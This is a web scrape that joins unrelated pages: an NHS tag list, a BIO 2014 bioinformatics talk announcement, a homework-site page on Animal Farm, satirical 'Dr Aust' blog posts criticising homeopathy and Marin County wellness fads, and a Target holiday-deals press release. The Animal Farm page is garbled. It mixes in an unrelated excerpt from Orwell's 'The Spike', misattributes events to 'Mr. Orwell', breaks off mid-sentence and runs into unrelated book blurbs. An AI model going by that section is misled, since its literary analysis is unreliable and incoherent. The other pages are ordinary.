Hospitals, Health and Social Care Integration, Health Select Committee, Healthcare Targets, Hereford and Worcester, House of Commons Health Select Committee, Local System Resilience Groups, Local Urgent Care Centres, London, Major Incidents Declared at English Hospitals, Medical Incident Officer, Midlands, National and Local Information Campaigns, National Institute for Health and Care Excellence (NICE), NHS 111, NHS 111 Statistics, NHS England Five Year Forward View, NHS England's Five Year Forward View (2014), NHS Five Year Forward View, NHS Providers, NHS Winter Project (BBC News), NHS Winter Project: NHS Local Performance Tracking Service, Northern Derbyshire GP Out-of-Hours Services, Northern Derbyshire Improvements to NHS111, Nurse Staffing Levels (A&E), Observer Effect, Out of Hours Services, Patient Safety, Patients Seen in 4 Hours: NHS Local Performance Tracking Service (NHS Winter Project), People Who Have to Wait More Than 4 hours to be Admitted: NHS Local Performance Tracking Service (NHS Winter Project), Performance Targets, Peterborough City Hospital, Preparations for Winter, Professor Keith Willett: NHS England, Public Satisfaction with NHS, Public Satisfaction with NHS (2015), Recovery at Home After Surgery or Hospital Admission, Recruitment Drives for A&E Doctors, Routine Operations (Cancellations), Royal Bolton Hospital, Royal Bolton Hospital NHS Foundation Trust, Royal Stoke University Hospital (Previously City General), Safari Rounds, Safe Staffing (A&E), Safe Staffing Levels, Short Stay Units for Elderly Patients, South Warwickshire System Resilience Group, Swindon, System Resilience Groups, Target Culture, Target-Driven Priorities, Targets, Trolley Waits, Unnecessary Hospital Admissions, Unplanned Hospital Admissions, Unscheduled Admissions, Urgent and Emergency Care, Urgent and Emergency Services, Urgent Care Services Outside of Hospitals, Waiting Time Targets in the NHS in England, Waiting Times for Routine Operations, Walsall Manor Hospital, Weaponising the NHS (Labour: Attributed Phrase), West Midlands Ambulance Service, West Midlands Ambulance Service NHS Foundation Trust, Winter Preparedness, Winter Pressure Funding, Winter Pressures, Winter Pressures Beyond Winter (Winter Re-Defined?), Worcestershire Royal Hospital | Leave a comment
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Dr. Sandra Porter to speak at Community College Day at BIO 2014
Dr. Sandra Porter, founder and president of Digital World Biology and longtime bioinformatics and biotech educator, will be speaking in the Community College Program at BIO 2014 in San Diego. Dr. Porter's talk, "Bioinformatics for Biotechnicians" will focus on the bioinformatics skills that biotechnicians need to learn, such as designing and testing PCR primers, using Excel, and using the NCBI.
In addition to providing the vision for developing Molecule World™, and related iBooks for interactive teaching, Dr. Porter serves as a community development leader for Bio-Link and teaches workshops and on-line courses in bioinformatics. Dr. Porter’s insights for developing new kinds of educational tools have grown out of her experience in teaching biotechnology and working with bioinformatics software.
Description of the talk:
Numerous types of biological data are stored in both public and private databases. Technicians in the bioscience industry are called upon to access these databases, find the appropriate data, download and assemble these data into collections, and work with these data to achieve specific goals. To accomplish these tasks, technicians need to know: how to find specific data records and validate that the records are correct, how to work with different kinds of software tools to extract information and analyze the data, and how to manage the data once they’ve found it. Additionally, to perform these tasks correctly and understand and validate the results, all of these tasks rely on a technician understanding the central dogma of molecular biology and the chemical properties of biomolecules such as DNA, RNA, and proteins. During the past seven years, we have developed an on-line bioinformatics course at Austin Community College that accomplishes these goals. Students learn about molecular structures, molecular sequences, genetic variation, and special topics, such as microarray analysis and Next Generation DNA sequence analysis by completing hands-on projects that utilize bioinformatics databases and software. This course can be adapted to serve multiple purposes through the choice of unknown samples and special topics.
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Home statistics homework help The dangers of a totalitarian government presented in animal farm by george orwell
The dangers of a totalitarian government presented in animal farm by george orwell
Forty-nine of us, forty-eight men and one woman, lay on the green waiting for the spike to open. We were too tired to talk much. We just sprawled about exhaustedly, with home-made cigarettes sticking out of our scrubby faces. Overhead the chestnut branches were covered with blossom, and beyond that great woolly clouds floated almost motionless in a clear sky.
It seeks to show how a society where all live completely equal has not been, and cannot be achieved. Orwell, through the use of the character Squealer, shows how propaganda can affect members of a communist society in a negative way.
The story uses simple language to explain and expose the corruption of communist Russia. Throughout the story, Orwell uses Squealer to illustrate how propaganda persuaded and victimized Russian citizens.
Squealer is a sly, crafty pig who is not only intelligent, but a manipulative speaker as well. His cunning is key to the deception of the other animals.
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In chapter three, Squealer deceives the animals of the farm for the first time. The animals find out that the milk and apples are given solely to the pigs, and Squealer is sent to explain the uneven distribution of farm resources. We pigs are brainworkers Finally, he convinces them with fear.
Jones would come back! Yes, Jones would come back! Jones, the abusive farmer that was driven out of the farm by the animals.
Squealer is desperate to obtain the apples and milk and will stop at nothing to manipulate the other animals into believing that the pigs should be the sole recipients of this luxury. By masking their true intentions by misleading the animals, the pigs are soon able to acquire whatever they want with little resistance.
Orwell points out the corruption of the Soviet authority in his criticism of the propaganda used to subdue opposition from the masses. Orwell also criticizes the monopoly of all Russian media by the government. It was his responsibility to inform the animals of the arrangements of labor distribution and any other relevant legislation or news.
Orwell establishes that a government-run publication as the only source of public information will inevitably be biased. Squealer is the only source of data the farm animals have. The animals have no way to dispute or question any of the statistics he delivered.
Squealer is the liaison between the government and the public. Though the animals believe they are being fed the same amount as when Mr. Orwell was able to show that by keeping the public in ignorance, communism can be carried out without interference.Lysistrata - Aristophanes.
penguin Banned in the US in , and in Greece by the Nazis in , and by the military junta in Lysistrata is an account of one woman's mission to end The Peloponnesian War - she convinces the women of Greece to withhold sexual privileges from their husbands and lovers as a means of forcing the men to negotiate peace.
Free dystopian papers, essays, and research papers. The Dystopian Genre Of By George Orwell - Information is closely controlled; sometimes, important information is hidden, and other times, information is altered or falsified outright.
Orwell and Language. George Orwell, explaining in an essay in why he became a writer, stated that when he was about sixteen he " suddenly discovered the joy of mere words." Orwell was passionate about the usage of the words of the English language and its .
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Dangers of Totalitarianism in Orwell's Essay Words | 7 Pages. by George Orwell is an extremely negative outlook on a futuristic, seemingly utopian society.
People inhabiting the land of Oceania are enslaved to the government, most without even realizing it. Free Literature: George Orwell research papers were donated by our members/visitors and are presented free of charge for informational use only.
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Dr Aust’s Spleen
A grumpy scientist writes
Black is white.. day is night.. less is more.. nothing is everything (yes, homoeopathy again)
One of the more reliable sources of online laughs recently has been the comments thread following a ludicrous letter criticizing the rather wonderful Professor Edzard Ernst that appeared in the Times Higher Educational Supplement a couple of weeks back.
The letter was penned by Michelle Shine, a London homeopath. Shine is criticizing Ernst for applying critical appraisal to CAM therapies (well, she would, wouldn’t she?).
Apparently, in Michelle’s view, this is not what a Professor of Complementary Medicine should be doing. He should be “giving leadership”…
Hmm. You might think this is precisely what Ernst is doing. He is leading by example, demonstrating to the “CAM community” that, if they really want to be integrated with the mainstream of medicine, they have to adhere to the same standards of evidence we demand for other treatments.
Sounds like leadership to me.
It also sounds like what academics are supposed to do – serious investigation, critical analysis, and trying to get to the root of what works, and what doesn’t – and how what does work, works.
But apparently that isn’t leadership (according to Michelle). Or what a Professor of Complementary Medicine is supposed to do (according to Michelle).
Professor and PR – they both begin the same way? Errm?
From the tone of her letter, Michelle Shine thinks Ernst’s job is not to study CAM. Rather, his job is to promote it. We can infer, I think, that this means uncritically promote it, which is what homeopaths like Michelle do for homeopathy. As many different Bad Science bloggers have recounted, the non-medical homeopaths mostly think that homeopathy is an “entire self-consistent healing philosophy”, and can treat anything, from asthma to major depression to cancer to HIV/AIDS. Oh, and it can prevent malaria as well [not] [1].
Rather more shamefully, Michelle Shine implies that by studying CAM, rather than promoting it, Ernst is “betraying” the ideals of the person who funded the Exeter Complementary Medicine Chair – the late building magnate Sir (John) Maurice Laing (1918-2008).
Shine writes:
“Sir Maurice Laing originally funded the chair that bears his name at the Peninsula Medical School in Exeter because he was passionate about CAM. His wife, Hilda, had suffered for years from tuberculosis and was cured of this serious disease through the use of a CAM discipline, very possibly homoeopathy.
There is a significant body of high-quality scientific research supporting homoeopathy, which can now be added to more than 200 years of case histories – all of which verifies homoeopathy as a valid system of medicine.
Consequently, Ernst’s “interventions” on behalf of homoeopathy/CAMs must be causing Sir Maurice to turn in his grave.”
Why the THES printed this snide personal attack at all escapes me.
Apart from anything else, it is not true. Even the bit that implies Laing must have wished he had hired a PR man.
A quick google through the THES archive reveals an obituary for Laing, published earlier this year. The piece includes quotes from Edzard Ernst’s reminiscences at a Memorial Service for Laing.
“Interestingly, while much of the research carried out by Professor Ernst was at odds with Sir Maurice’s strongly held belief in the value of alternative medicine, [Sir Maurice] never pulled the plug on the post, instead stumping up yet more money when it was needed.
After ten years, the £1 million endowment ran out and Professor Ernst turned to him for more funding after promises of money from other sources fell through. Sir Maurice sent a cheque in the post for another £500,000, made out in his name.
“It took him no time at all to comprehend and respect that I had no plans to promote anything and was devoted to scientifically testing these treatments,” Professor Ernst said. “He began to hear from numerous sources that I was not sufficiently supportive of the field, but he kept encouraging me to do the rigorous science.”
Which suggests that Laing, unlike Michelle Shine and her homeopathic friends, understood that University Professors are supposed to be serious scholars, and also that establishing something as a viable treatment in medicine requires evidence that it works.
Last week Edzard Ernst responded directly in the THES to Shine’s jibes. His response is worth reproducing in full.
“In our book Trick or Treatment? Alternative Medicine on Trial, Simon Singh and I evaluate the evidence for or against some 40 alternative therapies. We stress that several are backed by encouraging evidence while others are not.
In the case of homoeopathy, we conclude that “there is a mountain of evidence to suggest that homoeopathic remedies simply do not work”, which should not be surprising because they “typically do not contain a single molecule of any active ingredients”.
Homoeopaths have reacted by stating that:
we misrepresent data
we are bought by big pharma
I was fired by the General Medical Council
I am a bad scientist, a fraud and a quack.
Now Michelle Shine has added to this long list of insults and lies by claiming that I am “falling short of (my) job remit” and that I cause Sir Maurice Laing (who endowed my chair) “to turn in his grave” (Letters, 3 July).
During many meetings, Sir Maurice encouraged me to conduct the most rigorous research possible, regardless of what it might find. Shine points out that my remit is to “speak for complementary medicine to government, the public and within the university”. But this is precisely what I have done during the past 15 years, publishing about 1,000 articles in medical journals. However, to speak “for” a subject does not mean telling untruths. We all seem to have got used to homoeopaths misleading the public, but British scientists and academics are bound to insist on the best evidence available to date.”
So Ernst is a man of integrity, as was Sir Maurice Laing.
Unlike, one is forced to conclude, many homeopaths.
In the meantime, the comments thread below Shine’s letter has featured, over this last fortnight, a selection of bad science people (supporting Ernst, and pointing out the falsehoods in Shine’s letter) and of homeopaths giving Shine their vocal support.
One homeopath who showed up is William Alderson:
William trained at The London School of Classical Homoeopathy. He had originally sought homeopathic treatment out of desperation, but it was not simply the success of the treatment that convinced him of the importance of homeopathy. When he read Samuel Hahnemann’s Organon of Medicine and discovered that this was a medical system with a sound scientific basis, he determined to find out more, and ultimately to train as a homeopath himself. (emphasis mine)
Goodness. As William Alderson’s bio reveals, he is a man of many and varied talents. Unfortunately, the ability to tell whether something has a “sound scientific basis” is clearly not among them.
I especially had to laugh when I read Alderson’s comment that:
“The effects of [homeopathic] potentised remedies are highly implausible only if you limit your scientific approach to that of chemistry, and if you rigorously use an inappropriate test. If a wider range of scientific investigatory techniques are used, and if appropriate tests are used, then the results have the chance of according with the clinical evidence – 200 years of clinical evidence.”
Ho hum. And day is night, and black is white. At least in William Alderson’s homeopathic parallel universe (homeoverse?).
A brief recap. It has been repeated ad nauseam that, for homeopathic remedies to have biological actions, one would have to explain how “no molecules” can do more than “some molecules”. “Potentised” means, or course, “diluted with shaking, which shaking is believed by homeopaths to impart magical healing properties”. Following the dilution, there are no molecules of “remedy substances” left. None.
For this potion to do something, one would also have to explain how water magically “remembers” having once had something dissolved in it, when that stuff is not there any more. Water molecules “jostle” one another on a molecular scale at such a speed that any “space” left by a substance that was once there would be gone in a matter of a picosecond (a millionth of a millionth of a second) at the very most, and probably much quicker.
In addition, absolutely no credible science exists to show that a homeopathic remedy is distinguishable from pure water. James Randi famously offered a million dollars to anyone who could credibly demonstrate a “paranormal phenomenon” (homeopathy would qualify, see the noted Horizon programme a few years back), while Edzard Ernst and Simon Singh have recently offered ten thousands pounds of their own money to anyone who can show by any scientific method that homeopathic remedies are distinguishable from water.
No claimants have shown up to claim Ernst and Singh’s prize, and Randi still has his million bucks.
Finally, the homeopathic canard about “sceptics don’t use proper tests” (put another way: “Double blind trials to test our healing power? No fair!”) has been magisterially debunked by Ben Goldacre in his definitive pwning of homeopathy, and in many other places too.
So everything – everything – in Alderson’s ringing statement is…. well, frankly, rubbish.
As an academic used to correcting students’ misconceptions, I thought I ought to re-phrase Alderson’s statement to make its breath-taking ludicrousness a bit clearer. Or better still, I will correct it along the lines of a student project report or thesis, to make it clear what Alderson is really saying:
Bold black for Alderson’s original words
Blue for the new edits to clarify the meaning
Red for deletions
“The effects of potentised remedies are highly implausible only if you limit your scientific approach to that of using all the known laws of physics, chemistry and biology, and if you rigorously use an inappropriate test the same established tests proven over decades of experience to be the best way to test medical treatments.
If a wider range of scientific and pseudo-scientific investigatory techniques are used, including techniques that are inadequately controlled and or/spurious, and if inappropriate tests are used that do not rigorously exclude experimenter, observer and reporter biases, then the results have the chance of coming out apparently positive – according with the subset of the available “clinical evidence” that we homeopaths like to bang on about, namely 200 years of anecdotes, famously the least reliable kind of medical evidence there is. We will ignore the more rigorous clinical evidence that does not suit our a priori belief-based position, namely all the blinded trials and meta-analyses that demonstrate that homeopathy is simply an elaborate placebo.”.
Incidentally, it is not terribly surprising that William Alderson has appeared to fight Shine’s corner, as they seem to be close associates. Both are, or have been, associated with a recently set up charity HMC21, or “Homeopathy: Medicine for the 21st century”. Michelle Shine, according to this homeopathy website, was formerly Chair of the group, while William Alderson is the secretary.
HMC21 says its purpose is to:
“promote homeopathy, and to defend the right of people in the UK to choose homeopathy as a therapy within the National Health Service”
Obviously the way to do that is for people like Michelle to accuse Edzard Ernst of being dishonest, and for Alderson to back her up with 42-carat nonsense.
Let’s hope their squeakings are treated with the derision they deserve.
Are you listening, Vice Chancellors?
And… is it too much to hope that the Vice Chancellors of those Universities offering “B.Sc. degrees” in Homeopathy and other belief-based nonsense might be reading these exchanges in their THES? And getting a reminder of the difference between scholarship and education on the one hand, and promotion and pseudoscience on the other?
Finally, before I sign off, I thought I would try my hand at writing an advertising blurb for HMC21, and for the many homeopaths who seems to be able to achieve a stunning level of unconscious quantum doublethink when it comes to their preferred brand of belief-based wibble.
“Don’t like the physical laws of this universe? Insist on being judged by the laws of a parallel one you thought up specially!
Choose Homeopathy now!”
Just don’t expect me not to complain if you are trying to spend my taxes on promoting your parallel reality.
1. Over at his Thinking Is Dangerous blog, Dr* T recently celebrated the 2nd anniversary of the Simon Singh / Sense About Science BBC Newsnight investigation of homeopathic practitioners and pharmacies who recommended homeopathic malarial prophylaxis to people proposing to visit malaria-endemic countries. The anniversary has now triggered a series of other badscience bloggers to post comments about the British Royal Family’s favourite quackery. Enjoy.
Posted in Alternative medicine, bad science, Homeopathy, medicine, science, Uncategorized | 50 Comments »
Marin-ated in Woo
One of the abiding questions in the bad science fraternity is:
“Where on earth did all this Wibble come from?”
(“Wibble” being Dr John Crippen’s slightly more whimsical synonym for “Woo”)
There are all sorts of answers to this question.
One, of course, is that Woo/Wibble has always been with us. After all, Samuel_Hahnemann’s homeopathy is two hundred years old – as the homeopaths love to remind us, as if the persistence of an Alt.Reality belief system conferred any special legitimacy on it. And “Ancient Folk Wisdom” is, well, ancient – although it is necessary to note that much of what is nowadays being sold as “ancient folk healing wisdom” is nothing of the kind [1].
No. When Bad Science people ask “where does all the Woo / Wibble come from?”, they are usually asking two things.
Firstly, why is it so mystifyingly popular, given the advances science has made in understanding the natural world since the Enlightenment, and the progress that medicine has made in understanding and treating disease, especially over the last 50-60 years?
Secondly, who started this bizarre obsession with things like nutrition woo, ”Vitamania” and “Detox”?
A third question is where and when these ideas came to be so linked with the notion that embracing Woo is “empowering”, and is a statement of one’s freedom from corporate consumerism – something that is manifestly untrue, since Woo is a multi-billion dollar business, and is increasingly of interest to large companies.
I would like to suggest a possible answer to at least one or two of the above questions.
In answer to the question “Where on earth does it all come from”, I think I may have pinpointed the place – and as in so many things, it is all the fault of California.
Step forward, Marin County.
Or rather, lets step back to Marin County in the mid 1970s.
Because mid-70s, affluent, San Francisco Bay-area California seems to have been a key Woo-incubator.
If you’re going to San Francisco, be sure and wear some (Bach)_flowers in your hair
The best place to learn about the mid-70s Marin lifestyle is in one of the funniest satirical novels ever written about Californian (and, increasingly, global First World) obsessions, Cyra_McFadden’s brilliant The_Serial (subtitled “A year in the Life of Marin County”).
McFadden’s book is fondly remembered by those of us old enough to have read it in the 80s, or even the 70s. Last year, in a Guardian story about American health food chain Whole Foods Market opening up a Kensington outlet, Stephen_Bayley pithily described it thus:
“The best account of the hippy culture that gave rise to Whole Foods is Cyra McFadden’s superb 1977 cartoon novel, The Serial. Here she established an affinity between 12-speed bikes, high net worth, yoga, eternal life and the consumption of mung beans.”
And that gets close to the root of it. A lot of the first world craze for Alt Medicine has, in my view, to do with the angst that goes with being prosperous, relatively free of lethal threats to one’s life (whether disease epidemics or shooting wars), and yet still sneakingly aware that one is not immortal.
[Though to deal with this by obsessing about Alternative Reality in general, and CAM and nutritionism in particular, still seems strange to me. It always puts me in mind of the old joke: “Eating a vegan diet won’t make you live forever. It’ll just feel that way”]
The Serial was, as the name suggests, originally serialised in a local Marin County alternative newspaper in 1976-7. It is now sadly out of print [2]. This is a pity, since it skewers the pretensions and idiocies of worried wealthy middle-class navel-gazers like no other book I know, and would make salutary reading for anyone prone to embracing Alt.Reality as a result of their Affluenza..
The Wikipedia description of the book is a good introduction to it, but in case you can’t be bothered to click it:
Meet the Holroyds
The central characters of The Serial are Kate and Harvey Holroyd, a moderately prosperous and aspirational couple in their late 30s or therebouts who are having marital troubles. In the course of the book Kate and Harvey “explore their options”, both lifestyle- and relationship-wise, before ending up back together (just about).
On re-reading The Serial recently, and for the first time in around a decade, I was struck by the amount of stuff in it that would be instantly recognisable to regular readers of Holfordwatch, or indeed to anyone who peruses the “Lifestyle” sections of our national newspapers, or (for those of non-delicate disposition) Patrick Holford’s or Dr John Briffa’s websites.
Anyway, let’s get a taste of what the Marin-istas of the mid-70s were about.
Marlene and Harvey
The book’s single most nutrition-conscious character is Marlene, the ex-cheerleader that Harvey shacks up with during his “Sabbatical” from his marriage. Harvey meets Marlene at the check-out till in Safeway when she expresses horror at “the garbage” he eats:
“Do you know what white flour does to you?” she asked him… “It kills your enzymes”… (Ch 8).
Marlene soon moves in to Harvey’s bachelor pad, putting him on a punishing regime of (tantric?) sex, kelp and soya_milk, and sending him out in search of “organic fibre”. However, Harvey eventually begins to chafe at the new menu and the attendant beliefs:
“…Marlene was a raving fanatic about nutrition; she lectured Harvey endlessly about things like the body’s need for zinc, and wasn’t amused when he suggested amiably that they go out and chew on the Volvo bumper” (Ch 10)
Subsequently things turn a bit nasty when Marlene catches Harvey surreptitiously scoffing barbecue-flavour Fritos in the bathroom with the water running:
“First she screamed at him that if he was going to poison himself on chemical preservatives she “couldn’t be responsible”. Then she made him drink a quart of kefir to “neutralize the toxins”” (Ch 10).
Many other quintessential Altie enthusiasms also appear in the book: for instance, Vitamin E supplements (Ch 14); avoiding emulsifiers (Ch 20); ”bacon’s full of carcinogens” (Ch 24); lecithin deficiency (Ch 47). And there are more.
“Mind-body therapies” also feature; almost every character is “in therapy”, or, to put it in Marin-speak, “heavily into personal growth”. One character hands out gift certificates from the Physical Therapy Centre, which read:
“A new path to health has been opened to you…. May you continue to grow in balanced harmony…. Please Call to learn about your new options in life (Ch 51)
Children are not exempt
The 70s Marin gestalt also extends to children and child-raising. In the following excerpt ten year-old Che, son of one of Kate’s friends, has been sent away to holistic summer camp:
“When [Che]… broke out into a rash, envisioning himself brought to a rolling boil in the hot tub, his Surrogate Parent for the session made him drink a lot of lemon-grass tea. “Listen, Che,” said [his surrogate parent], “you’ve just made a conscious decision. You’re the one that decides to get sick or stay healthy. Listen, you want your body to call the shots?”
Che just wanted the camp to call [his mother] and tell her he’d forgotten his cortisone ointment. Maybe she’d come and bring it to him and he could hide out in the trunk of the Rover. Otherwise he was in for two more weeks of unstructured freedom that stopped short of “pharmaceuticals”…
Glumly, he consulted the bulletin board, listing the afternoon’s activities, posted outside the communal yurt:: belly dancing, spear fishing and herbal medicine. Che didn’t know what herbal medicine was but suspected lemon-grass tea was part of it.” (Ch 43)
Now it is impossible, I think, to not be struck by the correspondence between all this and the nonsense peddled daily in the “Health and Lifestyle” pages of newspapers, in the books of Holford et al., and on innumerable natural health websites. Lots of people are vaguely worried. And you can bet someone is going to sell them “the solution” to their worries, even if that solution is a bunch of bullshit.
Angst + Woo = ker-chinnng!
This is aptly summed up by an excerpt from one of The Serial’s earliest chapters (Ch 4), when Kate’s psychologist friend Leonard tries to persuade her to work on “getting clear” by attending a weekend at his retreat. Leonard lists services offered:
“…he began to chant seductively. “Wholistic nutrition…hypnosis…biofeedback… massage”. Kate was beginning to hyperventilate when he added, in another voice entirely, “Friday night through Sunday noon. One hundred and fifty bucks if you crash in the dorm. Extra charge for the hot tub. I take Master Charge, Amex, all your major credit cards.”
Which shows that the basic schtick of Alternative Therapy has not changed all that much in the intervening thirty plus years.
It’s just that now you don’t have to take a trip to the West Coast. You and your bank balance can get taken for a (wholistic) ride in Hemel Hempstead. Or central London. Or even rural Yorkshire.
Now there’s progress for you. Just don’t forget to bring an open mind [3]. And a major credit card.
[1] The Quackometer has a brilliant summary of the modern origins of many varieties of purportedly “ancient wisdom” Woo here.
[2] Although various editions can still be found second-hand – see for instance here and here.
[3] “Keep an open mind, but not so open that your brain falls out” – usually attributed to Richard_Feynman.
Posted in Alternative medicine, Cosmic insignificance, Humour, Nutri-nonsense | 22 Comments »
Diary (and attendant minor musings) – latest entry 22nd/23rd Dec and w October retrospectoscopy
Administering a rebuke
Plants make chemicals too.
(Y)ear-ily quiet
The sky fell on me head
White coats, white lies? Or black marks?
If I were a cartoonist
Be Careful What You Wish For – Even in Jest
Wanted – dedicated or alive
draust on The sky fell on me head
Phillip Helbig on The sky fell on me head
draust on Administering a rebuke
draust on Plants make chemicals too…
Grumpy Oldman on Administering a rebuke
Diego Fox on Plants make chemicals too…
Correct pronunciation - we old (-er) folk are particular about this
Glug glug glug … why those eight glasses a day don’t HAVE to be water (or eight).
Bad Administration
Bad science trashing gurus
Ben Goldacre’s Badscience
DC’s Improbable Science
Science-based medicine blog
Steve Novella’s Neurologica
Badscience posse
A Canna’ Change the Laws of Physics
Badscience blog aggregator
Dr* T’s “Thinking is Dangerous”
Gimpy’s Blog
Hawk / Handsaw
Holfordwatch
jdc325 (he’s not Richard Briers)
The Quackometer
Medical bloggers
Bad Medicine (Dr No)
Doctor Zorro
Dr Grumble
Northern Doctor
Pyjamas in Bananas
The Jobbing Doctor
None of the content on this blog is intended as medical advice.
Any information should not be used for diagnosis or treatment.
The author is not a medical doctor, nor has he had any medical training.
Dr Aust does, however, have:
(i) a B.Sc. in Chemistry & Biochemistry plus a Ph.D. in Physiology;
(ii) 20 yrs experience of doing (mostly unsuccessful) science;
(iv) a lifetime's experience of curmudgeonly grouching.
More unexciting info about Dr Aust and the Aust family here
You can contact Dr Aust by leaving a comment here or by email:
draustblog *at* gmail-dot-com
Be aware that I reserve the right to publish excerpts from the contents of emails
Some Favourite Sayings:
"Sliding down the razor blade of life" - Tom Lehrer
"The first principle [of scientific integrity] is that you must not fool yourself - and you are the easiest person to fool" - Richard Feynman
"Almost everything you do will be insignificant, but it is important that you do it" - Gandhi
"When things are exceedingly laughable, it is a little unreasonable to demand of us an imperturbable gravity."
- Prizewinning critique of homoeopathy, Rhode Island Medical Society, 1851.
[Thanks to the splendid British Veterinary Voodoo Society for introducing me to that last one]
"Never argue with an idiot. The best outcome you can hope for is that you won an argument with an idiot” - Anonymous Internet Sage
Alternative medicine Back-cracking bad science Bean Counting blogging books cargo cult science Cosmic insignificance Education Electro-wibble Evul Pharma history Homeopathy Humour Legal chill Managerial nonsense medicine Musical nonsense Nutri-nonsense Patrick Holford procrastination ruling idiocies science science politics sheer silliness The internet Uncategorized Universities vaccines Water-woo
Dr Aust on Twitter
RT @matthewcobb: The main way these territories will be detected is through scent marks. 2 hours ago
RT @david_colquhoun: Appalling. There are two reasons why I'll soon be trapped in Little England. 1. No airline can be trusted not to lose… 4 hours ago
RT @paullewismoney: Former Daily Mirror editor Piers Morgan one of the most vehement critics of the royal couple does not find time or spac… 4 hours ago
RT @MsIbegbuna: This is EXACTLY the right point to end an excellent article by @JenWilliamsMEN 'They’re our girls, collectively. And if m… 4 hours ago
RT @MrPeteRobbins: Not only Blair but also Harold Wilson are now Thatcherites I see. Jesus wept Clive, it’s only January and you’ve already… 5 hours ago
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Target unveils holiday plan with 10 Days of Deals
By Gina Acosta - 11/17/2016
MINNEAPOLIS -- Target revealed on Thursday its 10 Days of Deals promotion, featuring discounts on some of the retailer's most popular products, including toys, electronics, beauty and more.
Guests can shop the deals beginning Saturday, Nov. 19, through Monday, Nov. 28, in stores and on Target.com.
“The debut of 10 Days of Deals last year was wildly successful, offering guests significant savings and helping drive Target’s strongest results of the season,” said Mark Tritton, executive vice president and chief merchandising officer, Target. “This year, we’re bringing back some of our guests’ favorite offers, as well as introducing even more compelling deals, to help them save on the gifts and essentials that matter most during this time of year.”
The savings kick off on Saturday, Nov. 19. Guests can view the deals, along with any exclusions, beginning today by visiting Target.com/BlackFriday.
Deals include:
Saturday, Nov. 19: 30% off toys. This season, Target is introducing nearly 1,800 new or mass exclusives – an increase of more than 15 percent compared to last holiday season – including popular toys such as Star Wars, Trolls and Our Generation dolls.
Sunday, Nov. 20: 10% off electronics and entertainment. Guests will find popular products like iPads and iPods, and, new for this year’s promotion, iPhones and Beats.
Monday, Nov. 21: 20% off kitchen purchases, including Calphalon, Cuisinart, Keurig, KitchenAid, Ninja, OXO and Threshold.
Tuesday, Nov. 22: 25% off beauty. Target’s assortment of more than 15,000 products offers guests the perfect opportunity to stock up and save on brands such as Boots, Burt’s Bees, Chi, Dove, e.l.f., Harry Josh and NYX.
Wednesday, Nov. 23: Buy one, get one free frozen pizza. Target is bringing back its pizza deal of the year, offering guests a break from the kitchen leading up to the meal prep on Thanksgiving.
Thursday, Nov. 24: Doorbuster deals, featuring Target’s lowest prices ever on some of the hottest gifts and must-have products such as a 50" Hisense 4K UHD TV, $249.99 (special purchase), Fitbit Charge HR, $89.95 (Reg. $129.95) and Powerbeats 2 Wireless Earphones, $89.99 (Reg. $199.99).
Friday, Nov. 25: 30% off apparel, accessories and shoes for the family. With the changing of seasons comes a chance to update your look, from head to toe. Target has nearly 3,000 new items for the entire family from popular brands including Cat & Jack and Who What Wear. (Sale in apparel and accessories valid Thursday, Nov. 24 through Saturday, Nov. 26.)
Saturday, Nov. 26: Save $50 when you spend $100 in the Wondershop. New this year, Target has created Wondershop, a destination in stores and online featuring more than 2,000 new products for the season.
Sunday, Nov. 27 and Monday, Nov. 28: A surprise deal! Next week, Target will be announcing a new savings opportunity in stores and on Target.com.
As previously announced, Target is extending free shipping by a full week this holiday season, waiving the fee for all digital orders from Oct. 25 through Jan. 1. Guests who shop with a Target REDcard also receive 5 percent savings on nearly all items purchased in stores and online.
Target’s same-day delivery service now available on mobile app
Dollar General gets in the holiday spirit with charitable donations
Target acquisition bolsters delivery capabilities, brings new VP technology
Target names Gomez EVP and chief marketing officer
CVS Pharmacy unveils Black Friday, Cyber Monday deals
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